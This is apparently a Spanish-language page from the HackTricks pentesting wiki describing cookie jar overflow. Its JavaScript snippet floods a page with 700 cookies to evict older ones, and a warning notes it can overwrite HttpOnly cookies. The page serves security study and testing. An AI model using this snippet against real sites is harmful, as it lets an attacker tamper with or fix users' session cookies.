2.5 KiB
Los navegadores tienen un límite en la cantidad de cookies que pueden almacenar para una página. Entonces, si por alguna razón necesitas hacer desaparecer una cookie, puedes sobrecargar el frasco de cookies ya que las más antiguas serán eliminadas primero:
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}
// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}
Ten en cuenta que las cookies de terceros que apuntan a un dominio diferente no serán sobrescritas.
{% hint style="danger" %} Este ataque también se puede utilizar para sobrescribir cookies HttpOnly ya que se pueden eliminar y luego restablecer con el valor que se desee.
Comprueba esto en esta publicación con un laboratorio. {% endhint %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿o quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
-
Descubre The PEASS Family, nuestra colección exclusiva de NFTs
-
Consigue la ropa oficial de PEASS y HackTricks
-
Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.
-
Comparte tus trucos de hacking enviando PR al repositorio hacktricks y hacktricks-cloud.